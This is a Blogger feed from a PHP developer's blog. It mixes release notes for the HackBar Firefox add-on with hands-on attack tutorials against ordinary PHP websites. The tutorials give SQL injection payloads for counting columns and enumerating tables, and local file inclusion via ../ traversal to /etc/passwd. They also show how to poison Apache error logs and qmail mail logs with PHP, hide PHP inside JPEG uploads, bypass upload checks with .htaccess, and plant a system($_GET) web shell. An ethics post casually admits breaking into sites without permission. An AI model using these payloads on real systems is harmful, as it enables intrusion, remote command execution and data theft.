tag:blogger.com,1999:blog-58648081483387662722024-03-05T12:55:46.878+01:00Devels playgroundThe not so daily rants of a php developerJohan Adriaanshttp://www.blogger.com/profile/13965983227056280166noreply@blogger.comBlogger10125tag:blogger.com,1999:blog-5864808148338766272.post-37817936349277732682008-11-06T14:17:00.004+01:002008-11-06T14:42:32.189+01:00HackBar 1.4.1 beta release!Finally! The update we have been waiting for!<br /><br />It still needs a lot of testing so i'm releasing this as a beta, but it should work fine!<br /><br />Fixed:<br />- "OSX toolbar not showing" bug!!<br />- Better layout for INT/HEX addition/subtraction<br />- A few minor translation bugs<br /><br />New Features:<br />- Add/Subtract Octal<br />- Add/Subtract Alphabetical (a-z)<br />- Add/Subtract Alpha numeric (a-z 0-9)<br />- "Strip spaces" function, removes all space chars from selected string<br />- Convert characters to hex and back in 3 formats (00ff00ff, 00:ff:00:ff and 00 ff 00 ff)<br /><br />Any bugs / comments can be mailed to: johan.adriaans@gmail.com or posted as a comment below.<br /><br /><a href="http://www.izi-services.nl/downloads/hackbar_1.4.1.xpi">Download HackBar 1.4.1 here</a><br /><br />Have fun!Johan Adriaanshttp://www.blogger.com/profile/13965983227056280166noreply@blogger.com23tag:blogger.com,1999:blog-5864808148338766272.post-77326533919715505972008-07-08T11:50:00.009+02:002008-07-08T12:11:22.901+02:00NEW! Hackbar 1.3.2!Finally! It has arrived! It took me some time, but here is the new HackBar plugin.<br /><br />Actually.. I finished it a month ago, but the Mozilla testers are very busy at the moment so, my plugin is still being tested.. They are doing a great job! But i decided to release it here for the people who need this plugin to work in FF3 (I had loads of mail and comments, thanx!)<br /><br /><a href="http://www.izi-services.nl/downloads/hackbar_1-3-2.xpi">Download version 1.3.2 here!</a><br /><br />Please leave a comment if you like the new version!<br /><br />New features:<br /><ul><li>Added POST data manipulation (yay!)</li><li>Added Referrer string manipulation</li><li>Fixed tab-behavior</li><li>Show / Hide hot key [F9]</li><li>Show / Hide tools menu item</li><li>Show / Hide toolbar button</li><li>Code revision (again)</li><li>New layout, for more menus and buttons</li><li>Added SHA-1 and SHA-256 encryption</li><li>Added ROT13.. (request :)</li><li>Added Hex +1 and -1 buttons</li><li>Added a bunch of useful SQL injection strings and tricks</li><li>Added a bunch of useful XSS strings and tricks</li><li>Added add/stripslashes</li><li>.. and a few small things and fixes</li></ul><br /><span style="font-weight: bold;">Screenshots:</span><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge7hQqQbviyy1IA-_hSwKKrHpeLdu_tlG33oh_cEjLMHb4h_qkyVoTGghyphenhyphenZTEZlxtQHIwYJvsNDPzmKxRee3PFnpUNP-R2_xaIa-m3-gVRYQ1lpqpGrsTXHKVy5Mcxkec6rH98UjcERuPM/s1600-h/look_and_feel.png"><img style="cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge7hQqQbviyy1IA-_hSwKKrHpeLdu_tlG33oh_cEjLMHb4h_qkyVoTGghyphenhyphenZTEZlxtQHIwYJvsNDPzmKxRee3PFnpUNP-R2_xaIa-m3-gVRYQ1lpqpGrsTXHKVy5Mcxkec6rH98UjcERuPM/s400/look_and_feel.png" alt="" id="BLOGGER_PHOTO_ID_5220581597238678482" border="0" /></a><br /><span style="font-style: italic;">New look and feel</span><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbhrMPOkdi-7RRshSSKQ_hkia0vFP573Hk3AmYdh08QsHZmQKz7sJ_ZB3GlYsNWvjpdezqcjemGA4sTmOUeiTCg_KOvucxKkTwe-J-nRGc1U5-0IL_4Db-doJz63kN1TylqRMzz8m7OUCB/s1600-h/more_stuff.png"><img style="cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbhrMPOkdi-7RRshSSKQ_hkia0vFP573Hk3AmYdh08QsHZmQKz7sJ_ZB3GlYsNWvjpdezqcjemGA4sTmOUeiTCg_KOvucxKkTwe-J-nRGc1U5-0IL_4Db-doJz63kN1TylqRMzz8m7OUCB/s400/more_stuff.png" alt="" id="BLOGGER_PHOTO_ID_5220582115176251186" border="0" /></a><br /><span style="font-style: italic;">More stuff! In drop-down menus</span><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhayAL65f4jlW5saJI7KiI2BZN_KqceIvvn3ARpHj6AqW8E_fhCAwiUAku2L8eB-pkto85uSPJtJn3356TdW7gsh2y3Cliwu9dtIW0xnZWtJXj7tnoWKKLe6U2bh6NtiXnWYwH4DyzPu4Yu/s1600-h/more_encryptions.png"><img style="cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhayAL65f4jlW5saJI7KiI2BZN_KqceIvvn3ARpHj6AqW8E_fhCAwiUAku2L8eB-pkto85uSPJtJn3356TdW7gsh2y3Cliwu9dtIW0xnZWtJXj7tnoWKKLe6U2bh6NtiXnWYwH4DyzPu4Yu/s400/more_encryptions.png" alt="" id="BLOGGER_PHOTO_ID_5220581815702183762" border="0" /></a><br /><span style="font-style: italic;">More of everything! (More encryptions (sha1/2))</span><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiQK5oUjeVcXk8DJhIikkqqufhsH2lQwiBb6ADByfH50iAKbREVHZi3pHEnoM1aGyJ8FAkiZpA7I7-8N7zlbwR40FXHaLLxBy-4JTE8N5zOenuJDlIyiemha8DLhoHREH0cVMkEAANWY9q/s1600-h/post_data.png"><img style="cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiQK5oUjeVcXk8DJhIikkqqufhsH2lQwiBb6ADByfH50iAKbREVHZi3pHEnoM1aGyJ8FAkiZpA7I7-8N7zlbwR40FXHaLLxBy-4JTE8N5zOenuJDlIyiemha8DLhoHREH0cVMkEAANWY9q/s400/post_data.png" alt="" id="BLOGGER_PHOTO_ID_5220582323094407426" border="0" /></a><br /><span style="font-style: italic;">Edit post data on the fly!<br /><br /></span><span>Have fun!</span><span style="font-style: italic;"><br /></span>Johan Adriaanshttp://www.blogger.com/profile/13965983227056280166noreply@blogger.com38tag:blogger.com,1999:blog-5864808148338766272.post-47696252561334175652008-01-07T22:28:00.000+01:002008-01-08T00:04:11.283+01:00SQL injection: Getting the table namesYep, this is a big issue. There are a few good tricks that will allow you to query for this information, especially in M$SQL. MySQL has a few small tricks as well, but this 'feature' was introduced in version 5 and is disabled on some servers.<br /><br /><span style="font-weight: bold;"># MySQL and the INFORMATION_SCHEMA database</span><br /><br />Now this neat feature was introduced in MySQL 5. Its a database containing.. information about all databases, tables, colums, fields, priveleges, keys.. you name it! The best thing is, the default setting is to allow normal users read rights to this database. It CAN be disabled by a MySQL administrator, but most MySQL 5 server i have seen are 'vulnerable'.<br /><br />Detailed information can be found here: <a href="http://dev.mysql.com/doc/refman/5.0/en/information-schema.html">http://dev.mysql.com/doc/refman/5.0/en/information-schema.html</a><br /><br />Here is a small example from the MySQL command line: (<span style="font-family:courier new;">TABLE_SCHEMA means 'database'</span>)<br /><span style="font-family:courier new;">mysql> SELECT `TABLE_NAME` FROM `INFORMATION_SCHEMA`.`TABLES` WHERE `TABLE_SCHEMA` = 'mysql';</span><br /><span style="font-family:courier new;">+---------------------------+</span><br /><span style="font-family:courier new;">| TABLE_NAME </span><br /><span style="font-family:courier new;">+---------------------------+</span><br /><span style="font-family:courier new;">| columns_priv </span><br /><span style="font-family:courier new;">| db </span><br /><span style="font-family:courier new;">| func </span><br /><span style="font-family:courier new;">| help_category </span><br /><span style="font-family:courier new;">| help_keyword </span><br /><span style="font-family:courier new;">| help_relation </span><br /><span style="font-family:courier new;">| help_topic </span><br /><span style="font-family:courier new;">| host </span><br /><span style="font-family:courier new;">| proc </span><br /><span style="font-family:courier new;">| procs_priv </span><br /><span style="font-family:courier new;">| tables_priv </span><br /><span style="font-family:courier new;">| time_zone </span><br /><span style="font-family:courier new;">| time_zone_leap_second </span><br /><span style="font-family:courier new;">| time_zone_name </span><br /><span style="font-family:courier new;">| time_zone_transition </span><br /><span style="font-family:courier new;">| time_zone_transition_type </span><br /><span style="font-family:courier new;">| user </span><br /><span style="font-family:courier new;">+---------------------------+</span><br /><span style="font-family:courier new;">17 rows in set (0.06 sec)</span><br /><br />I guess you get the point here.. using this method in a union select query gets you all the information you need.<br /><br /><br /><span style="font-weight: bold;"># M$SQL SysObjects table</span><br /><br />In M$SQL we have someting way better! The SysObjects table is a table containing all information about all objects created in the database. As far as i know there is no way of disabling a normal user access to this table. A simple example is:<br /><br /><span style="font-family:courier new;">(Look for a (U)ser table starting with 'user')<br />SELECT name FROM sysObjects WHERE type = 'U' AND </span><span style="font-family:courier new;">name </span><span style="font-family:courier new;">LIKE 'user%'</span><br /><br /><br /><span style="font-weight: bold;"># 'Social' engineering</span><br /><br />If all else fails, social engineering is the place/thing to be!.. go.!..do!<br />This can be very tedious and its pretty hard to keep up, but it almost never fails! You can make a very educated guess about what the database tables are, if you look good enough. I usually start at a login form. If the user and password fields are named: 'user' and 'password' the database layout will probably be:<br /><ol><li>Pretty default.. table is probably something like: user(s), login, account(s) etc..</li><li>Database and table names are probably english<br /></li></ol>Now if the developer chose to name these fields: 'usr' and 'passwd' we should look at some other table / column names, and if these fields are in a non-english language, take it from there.. (and good luck ;)<br /><br />If you have some visual feedback from your SQL injection you can query for the database() and user() values.<br /><br /><span style="font-family:courier new;">SELECT database(), user();<br /></span><br />This too will give you some basic information about the developers naming standards.<br /><br />If you still can't find any tables, its probably a good idea to start thinking about table prefixes. This is somewhat outdated but still often used. Now what kind of prefix are we looking for? Most of them are 3 letter combinations followed by an underscore. Acronyms for software packages or company names. Only very seldom i find a site that uses the 'tbl_' prefix. But it did happen .. once ;)<br />Find out the developers name, what the CMS system is called, what the site itself is called and try a few acronyms.<br /><br />--------<br /><br />All this guessing around might seem to be based on a whole lot of luck, but it really isn't. In my time as a security auditor i found only one single website that had such obscure table names i could not detect any user tables.<br /><br />It might take you a few hours, but you will get there. Trust me. ;)<br /><br />Oh and dont forget, table names are case insensitive! ;)Johan Adriaanshttp://www.blogger.com/profile/13965983227056280166noreply@blogger.com6tag:blogger.com,1999:blog-5864808148338766272.post-27849057593041830442007-08-07T21:31:00.000+02:002007-08-07T21:51:20.718+02:00Union select column countA lot of people seem to be asking around for a way to detect the amount of columns needed for a successful 'union select' injection. It might be old news for a lot of people, but others are still wrestling with pure guessing. So here goes nothing ;)<br /><br />When trying to execute a union select, make sure you are on a mysql 4 or higher server! Union selects will not work on mysql 3 or lower.<br /><br />O.k. let's take the following news query:<br /><span style="font-family:courier new;">SELECT * FROM `news` WHERE `news_id` = 121</span><br /><br />The URL to access this query is: /news.php?news_id=121<br /><br />So our injection point in this query is: '121'.<br /><br />Now lets find out if the news_id is injectable<br /><span style="font-weight: bold;">test:</span> /news.php?news_id=121 and 1=1<br /><span style="font-weight: bold;">result needed: </span>success<br /><br /><span style="font-weight: bold;">test:</span> /news.php?news_id=121 and 1=0<br /><span style="font-weight: bold;">result needed: </span>empty page<br /><br />version 4 or higher?<br /><span style="font-weight: bold;">test:</span> /news.php?news_id=121 and version() >= 4<br /><span style="font-weight: bold;">result needed: </span>success<br /><br />Now comes the cool part. We know we can order data using column names, but we can also order our result set using column numbers. We can use this knowledge to test the amount of columns used in the query.<br /><br />Does the column / order trick work? (order by first column)<br /><span style="font-weight: bold;">test:</span> /news.php?news_id=121 order by 1/*<br /><span style="font-weight: bold;">result needed: </span>success<br /><br />More than 10 columns?<br /><span style="font-weight: bold;">test:</span> /news.php?news_id=121 order by 10/*<br /> <span style="font-weight: bold;">result needed: </span>success / failure, based on the amount of columns.<br /><br />More than 20 columns?<br /> <span style="font-weight: bold;">test:</span> /news.php?news_id=121 order by 20/*<br /> <span style="font-weight: bold;">result needed: </span>success / failure, based on the amount of columns.<br /><br />etc...<br /><br />Now lets say there were 12 columns in the news table.<br /> <span style="font-weight: bold;">test:</span> /news.php?news_id=121 order by 11/* -- Succeeded<br /> <span style="font-weight: bold;">test:</span> /news.php?news_id=121 order by 12/* -- Succeeded<br /> <span style="font-weight: bold;">test:</span> /news.php?news_id=121 order by 13/* -- Failed<br /><br />Joy! so 12 it is. Now you can easily inject your union select query. ;)<br /><span style="font-weight: bold;">Union Select:</span> <span style="font-family:courier new;">/news.php?news_id=12 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12/*</span><br /><br />Good luck ;)Johan Adriaanshttp://www.blogger.com/profile/13965983227056280166noreply@blogger.com13tag:blogger.com,1999:blog-5864808148338766272.post-91228220338206053432007-08-04T21:21:00.000+02:002007-08-07T21:53:08.182+02:00local file inclusion tricksI keep on ranting about file inclusion while this is not something we see every day. I promise this will be my last post on this subject for a while :)<br /><br />First off, if you did no reconnaissance and you don't really know where you are on the file system but you do know where to go, don't worry about the amount of ../ you're using. You can't go beyond the root of the file system, the rest of the ../'s will just be ignored. So if you are in /var/www/vhosts/domain.com/httpdocs and you try to include ../../../../../../../../../../etc/passwd, it will work fine.<br /><br />Now to actually include some PHP code! There are a few things you can do. Of course you could try to include external files, which would be the easy way to go.. but some administrators turn this feature off in the php.ini.<br /><br /><br /><span style="font-weight: bold;">// ----- 1: apache error_log injection -----</span><br />Inject php code in the apache error log.<br /><span style="font-family:courier new;"> $ telnet xxx.xxx.xxx.xxx 80</span><span style="font-family:courier new;"><br />Trying xxx.xxx.xxx.xxx...</span><span style="font-family:courier new;"><br />Connected to xxx.xxx.xxx.xxx.</span> <span style="font-family:courier new;"> Escape character is '^]'.</span><br /><span style="font-family:courier new;"> GET /< ?php phpinfo(); ? > HTTP/1.0</span><br /><br />After that you can include the error log file. The embedde PHP code will be executed. a few places to look for the error log file:<br />/var/log/httpd/error_log<br />/usr/local/apache/log/error_log<br />/usr/local/apache2/log/error_log<br />etc..<br /><br /><br /><span style="font-weight: bold;">// ----- 2: Malicious image upload -----</span><br />When the website allows its users to upload images (like avatars). You could use the method explained in my previous post: <a href="http://devels-playground.blogspot.com/2007/08/safe-remote-file-inclusion.html">"'Safe' remote file inclusion"</a> to upload a malicious image.<br /><br /><br /><span style="font-weight: bold;">// ----- 3: Send e-mail -----</span><br />This is actually pretty hard to exploit, although it IS possible. You could of course try to send an e-mail to the web server user (e.g. apache@hostname) and include /var/spool/mail/apache. This method never worked for me, and i don't think any up-to-date linux system supports this 'feature'.<br /><br />The second method is somewhat elaborate. I will explain it using qmail examples, but most mail servers support this feature.<br /><br />You will need to include the maillog file. This is often located at /var/log/maillog. Now to inject some php code, look at the following example:<br /><br /><span style="font-family:courier new;">root@test:/# telnet localhost 25</span><br /><span style="font-family:courier new;">Trying 127.0.0.1...</span><br /><span style="font-family:courier new;">Connected to localhost.</span><br /><span style="font-family:courier new;">Escape character is '^]'.</span><br /><span style="font-family:courier new;">220 hidden.domain.com ESMTP</span><br /><span style="font-family:courier new;">HELO</span><br /><span style="font-family:courier new;">250 hidden.domain.com</span><br /><span style="font-family:courier new;">MAIL FROM: anything </span><span style="font-family:courier new;">< ?phpinfo();? ></span><span style="font-family:courier new;"> </span><br /><span style="font-family:courier new;">250 ok</span><br /><span style="font-family:courier new;">RCPT TO: non-existing@user.com</span><br /><span style="font-family:courier new;">250 ok</span><br /><span style="font-family:courier new;">DATA</span><br /><span style="font-family:courier new;">354 go ahead</span><br /><span style="font-family:courier new;">Subject: phpInjectionTest</span><br /><span style="font-family:courier new;">.</span><br /><span style="font-family:courier new;">250 ok 1186501618 qp 7063</span><br /><span style="font-family:courier new;">quit</span><br /><span style="font-family:courier new;">221 hidden.domain.com</span><br /><span style="font-family:courier new;">Connection closed by foreign host.</span><br /><span style="font-family:courier new;">root@test:/# grep phpinfo /var/log/maillog</span><br /><span style="font-family:courier new;">Aug 7 17:46:59 test qmail: 1186501618.685225 info msg 3903353: bytes 198 from </span><span style="font-family:courier new;">< ?phpinfo();? ></span><span style="font-family:courier new;"> qp 7086 uid 2020</span><br /><span style="font-family:courier new;">Aug 7 17:46:59 test qmail-remote-handlers[7090]: from=?php-phpinfo();?</span><br /><span style="font-family:courier new;">root@test:/# echo "</span><span style="font-family:courier new;">< ?phpinfo();? ></span><span style="font-family:courier new;">" | php</span><br /><br />The above steps are:<br /><ol><li>Telnet into the mail server.</li><li>Fake the sender address: Anything < ?phpinfo();? >. (Spaces are replaced by underscores. So you need to prevent those.)<br /></li><li>Look for the phpinfo string in the log file<br /></li><li>Test it in PHP</li></ol>The third method, is to send a real email, to a real user, and include the mail file. This might be a bit hard because you will have to guess the filename. The default location for the qmail files is:<br />/var/qmail/mailnames/[domain.com]/[user]/Maildir/new/.<br />And the files look like: 1186501037.4564.server.domain.com. (Meaning [timestamp].[PID].[hostname])<br /><br />The filename can be guessed using the maillog, the approximate timestamp and PID will show up in this log file. Although its pretty hard to read if you're not familiar with this log format.<br /><br /><br /><span style="font-weight: bold;">// ----- Conclusion -----</span><br />There are a lot of cool ways to include PHP snippets on a vulnerable server, the easiest one is to write it to the error_log file. This file is written by the web server, and easily accessible (without the open_basedir restrictions of course).<br /><br /><span style="font-weight: bold;">// ----- What to inject?! -----</span><br />The best start is to inject something like:<br /><span style="font-family:courier new;">< ?system($_GET['x']);? ></span><br />This allows you to execute any command on the server using the x _GET value. After that you're practically in.Johan Adriaanshttp://www.blogger.com/profile/13965983227056280166noreply@blogger.com10tag:blogger.com,1999:blog-5864808148338766272.post-92226040083081289822007-08-03T23:07:00.000+02:002007-08-07T16:56:42.907+02:00'Safe' remote file inclusionAs mentioned in my previous post: "PHP Image uploaders", It is possible to embed PHP code in a normal jpeg image. With the valid extension this will upload in any image upload script. It will be treated like any normal image. The embedded PHP code will stay untouched unless the image is resized or pulled through imageMagick / GDlib for any reason. These libs will not trigger any errors, they just strip of the excess data (meaning the embedded PHP code ;)<br /><br />When executing or including these PHP files. The image data blob will be printed to the screen, this is slightly annoying.. but the PHP code will also be executed. Some black hat readers might see the opportunity here. When you find a remote file inclusion, and you want to inject some PHP code, its often tricky to host in on:<br />1. Your own server<br />2. A 'hacked' server (which i don't know anything about)<br /><br />So a simple option might be: write your PHP script, embed into a jpeg file, and host it on any open image upload server. I tested it on imageshack, and it seems to work there. The only requirement is that the file should not be resized or changed in any way.<br /><br />After this you can include the .jpg file. And the PHP code embedded in the image will be executed.<br /><br />Here is a simple test you can run:<br />Get your favorite image.. called image.jpg and go a little something like this:<br /><span style="font-family:courier new;">$ echo "< ?php phpinfo(); ? >" >> image.jpg<br />$ echo "< ?php include('image.jpg') ? >" > test.php<br /></span><span style="font-family:courier new;"><br /><br /><span style="font-family:georgia;">Now open test.php in your browser, and behold! phpinfo() output.. with a bunch of nasty binary characters above it.<br /><br />Here is a demo file containing phpinfo(): <a href="http://img258.imageshack.us/img258/3822/gnarfmh9.jpg">http://img258.imageshack.us/img258/3822/gnarfmh9.jpg</a><br /><br /></span></span>Johan Adriaanshttp://www.blogger.com/profile/13965983227056280166noreply@blogger.com3tag:blogger.com,1999:blog-5864808148338766272.post-58040782326164736072007-06-26T23:50:00.000+02:002007-08-04T01:26:02.868+02:00PHP Image uploadersImage uploads are pretty common these days, you get them in most forums, weblogs, community sites etc. There are basicly 2 methods of determining if the uploaded file is an actual image.<br /><br /><span style="font-weight: bold;">1:</span> Check the file extension. This should be gif, jpg or png.<br /><span style="font-weight: bold;">2:</span> Check the file layout, using the PHP getimagesize() function, which is way cooler, cuz it is.<br /><br />If by chance the developer wasnt paying attention and doesn't check the extension properly, but does use the getimagesize function to determine the image type. You can upload a 'special' file that passes all PHP image checks and still executes the embedded PHP.<br /><br />Just take a basic jpeg image (yes, your avatar will do) open it in your favorate hex editor, open your php file next to it, and copy-paste the php hex data below the image hex data.<br /><br />Next, rename the file.jpg to file.php, and try to upload it.<br /><br />The thing with jpeg is, its not bothered by excess data. The jpeg header takes care of that. A php file just shows its contents, until it finds those cute php tags. So when opening this 'image' in a browser, it will be executed like a normal php file.<br /><br />I used this image spoof about 20 times now, and it worked about 5 times. So its a long shot, but surely, worth a try.<br /><br /><span style="font-weight: bold;">PS:<br /></span>if it doesnt work, try to upload a .htaccess file containing:<span style=""> <span style="font-style: italic;">AddType application/x-httpd-php .jpg<br /></span>and uploading your .php file as a .jpg file. Because of the weird filename layout (.htaccess == no filename and a suspiciously long file extension) some upload checks let it pass through. (older versions of FCKeditor for example)<span style="font-style: italic;"><br /></span></span>Johan Adriaanshttp://www.blogger.com/profile/13965983227056280166noreply@blogger.com0tag:blogger.com,1999:blog-5864808148338766272.post-42655100685699117042007-06-26T22:00:00.000+02:002007-06-26T23:32:59.079+02:00Security and its ethics<span style="font-style: italic;">'Cool I hacked some site! I must now tell the owner (whoever that may be) how he should fix his bogus security.. and of course, what a 1337 H@xor I am!'..</span><br /><br />When I find SQL injections, most of the time i don't even bother telling the owner of the site, unless of course, its something big and important, and lives are (or my money is) at stake. Most of the time you get a lame reply or none at all.. and this made me think.<br /><br />Finding security leaks is fun for me, its a challenge. When I'm actually IN, I lose interest real fast. The rush you get, when you get closer and closer, is the best there is! The thing is.. telling the owner you were in his backend, proving it with pretty screenshots is roughly equivalent to forcing your way into his living room and sending him a postcard afterwards (with you in it.. on his couch.. watching his p0rn) . What more can we expect but a pale faced: "Thank you for not telling anyone.."?<br /><br />This is different for the bigger companies. They have the beauty of bureaucracy! This is just a fancy word for: "<span style="font-style: italic;">Hi Boss, I didn't do it, it was that guy over there.. oh wait.. he quit a few weeks ago.. you want me to fix it? I'd be happy to!</span>"<br /><br />This is even more different for the really big companies with a security team on top. They tend to sue you to death, or if they are really impressed, hire you! (probably worse)<br />Just picture yourself in a bank vault, explaining your 'bendy paperclip technique' that allowed you to open the door while disabling any surrounding camera's or alarms.. pure horror!<br /><br />So.. its better to not say anything.. is it? Well no.. the best thing i can think of is, just be real careful when you do tell. Don't try to be the all knowing hacker that saved them from a pity full doom. Just tell them what you do, why you do it, and... what you did :)<br /><br />Or even better, contact them in advance, ask them if its ok. I did it a few times, it works great. The only problem is that this approach kind of kills the ninja feeling of it all.. but thats just me i guess.Johan Adriaanshttp://www.blogger.com/profile/13965983227056280166noreply@blogger.com3tag:blogger.com,1999:blog-5864808148338766272.post-66003371837831286362007-06-26T21:46:00.000+02:002007-06-26T21:58:57.020+02:00Hackbar 1.1.1I have released the new version of the HackBar firefox plugin. Well.. not exactly.. i released it a month ago, but it should be on this blog, so here it is.<br /><br />>> So... why the lame name?<br /><< Well.. it started out as a joke. I wanted to write a firefox plugin, and i was fed up with the confusing and unreadable url when performing SQL injections. So a lame textarea toolbar was born. I decided to call it HackBar.. cuz, thats what it helps you do.. doesn't it? After a while i saw the error of my way. The first problem was getting it through the firefox plugin people. That took about a month.. And now, its not just my toy, its anyones toy.. And apparently its my problem that its not available in chinese.. or some other language i cant read.<br /><br />Anyway, heres the link: <a href="https://addons.mozilla.org/en-US/firefox/addon/3899">https://addons.mozilla.org/en-US/firefox/addon/3899</a><br /><br /><br /><span style="font-weight: bold;">Hackbar 1.1.1 description<br /><br /></span><span style="font-family: courier new;"># New features</span><br /><span style="font-family: courier new;"> - Show / Hide hotkey [F9]</span><br /><span style="font-family: courier new;"> - Tab sensitive</span><br /><span style="font-family: courier new;"> - Auto load, split and focus when pressing hotkey on a new URL.</span><br /><span style="font-family: courier new;"> - Localized ( English and dutch for now )</span><br /><span style="font-family: courier new;"> - Textarea width set to 100% (removed dragbar)</span><br /><span style="font-family: courier new;"> - Complete code revision (OO based instead of functions)</span><br /> <br /><span style="font-family: courier new;"> # In general</span><br /><span style="font-family: courier new;"> This toolbar will help you in testing sql injections, XSS holes and site security. It is NOT a tool for executing standard exploits and it will NOT learn you how to hack a site. Its main purpose is to help a developer do security audits on his code. If you know what your doing, this toolbar will help you do it faster. If you want to learn to find security holes, you can also use this toolbar, but you will probably also need a book, and a lot of google :)</span><br /> <br /><span style="font-family: courier new;"> # The advantages are:</span><br /><span style="font-family: courier new;"> - Even the most complicated urls will be readable</span><br /><span style="font-family: courier new;"> - The focus will stay on the textarea, so after executing the url (ctrl+enter) you can just go on typing / testing</span><br /><span style="font-family: courier new;"> - The url in textarea is not affected by redirects.</span><br /><span style="font-family: courier new;"> - I tend to use it as a notepad :)</span><br /><span style="font-family: courier new;"> - Usefull tools like on the fly uu/url decoding etc.</span><br /><span style="font-family: courier new;"> - All functions work on the currently selected text.</span><br /> <br /> <br /><span style="font-family: courier new;"> # Load url ( alt a )</span><br /><span style="font-family: courier new;"> This loads the url of the current page into the textarea.</span><br /> <br /><span style="font-family: courier new;"> # Split url ( alt s )</span><br /><span style="font-family: courier new;"> When this button is clicked, the url/text in the textarea will be split into multiple lines using the ? and & character</span><br /> <br /><span style="font-family: courier new;"> # Execute ( alt x, ctrl enter )</span><br /><span style="font-family: courier new;"> This will execute the current url in the textarea, i mostly use ctrl+enter</span><br /> <br /><span style="font-family: courier new;"> # INT -1 ( alt - )</span><br /><span style="font-family: courier new;"> First select a number in the textarea and press this button, the number will be lowered by 1 and the url will be loaded.</span><br /> <br /><span style="font-family: courier new;"> # INT +1 ( alt + )</span><br /><span style="font-family: courier new;"> Again first select a number in the textarea and press this button, 1 will be added to the number and the url will be loaded.</span><br /> <br /><span style="font-family: courier new;"> # MD5 Hash ( alt m )</span><br /><span style="font-family: courier new;"> this is a standard hashing method, often used as an encryption method for passwords. It will MD5 hash the currently selected string.</span><br /> <br /><span style="font-family: courier new;"> # MySQL CHAR() ( alt y )</span><br /><span style="font-family: courier new;"> If quotes are escaped but you did find an SQL injection thats exploitable, you can use this button to convert lets say:</span><br /><span style="font-family: courier new;"> load_file('/etc/passwd') --> load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)) </span><br /><span style="font-family: courier new;"> Thus omiting the use of quotes to load a file. </span><br /><span style="font-family: courier new;"> You can also use this on </span><br /><span style="font-family: courier new;"> WHERE foo LIKE ('%bar%') --> WHERE foo LIKE (CHAR(37, 98, 97, 114, 37))</span><br /> <br /><span style="font-family: courier new;"> # MsSQL CHAR() ( alt q )</span><br /><span style="font-family: courier new;"> Same story as MySQL CHAR(), MsSQL has a slightly different CHAR syntax</span><br /><span style="font-family: courier new;"> --> WHERE foo LIKE ( CHAR(37) + CHAR(98) + CHAR(97) + CHAR(114) + CHAR(37))</span><br /> <br /><span style="font-family: courier new;"> # Base64 encode / decode</span><br /><span style="font-family: courier new;"> Base64 encoding ( UU ) is often used to store data (like a return url etc.) This will help you to read those values.</span><br /> <br /><span style="font-family: courier new;"> # URLencode / decode</span><br /><span style="font-family: courier new;"> This will encode or decode the currently selected characters to url safe characters. I mostly use it to end a query with # (%23) when in a pseudo path where i cant use /* or --<br /><br /><br /></span>Johan Adriaanshttp://www.blogger.com/profile/13965983227056280166noreply@blogger.com12tag:blogger.com,1999:blog-5864808148338766272.post-28945422676577397422007-06-26T21:11:00.000+02:002007-08-03T23:07:28.075+02:00Cool! another blog full of crap... about stuff!Yep.. you're so right!<br /><br />I'm a PHP developer, I'm interested in lots of things, mostly web development and i needed an outlet. So here we are.<br /><br />Security is something I like to play with, it's nice out-of-the-box thinking. A fitting description would be "a jigsaw puzzle without the pretty picture.." But that would just be plain silly.<br /><br />Next to that i tend to release some scripts and applications onto the word...<br />So now you know.. bare with me :)Johan Adriaanshttp://www.blogger.com/profile/13965983227056280166noreply@blogger.com0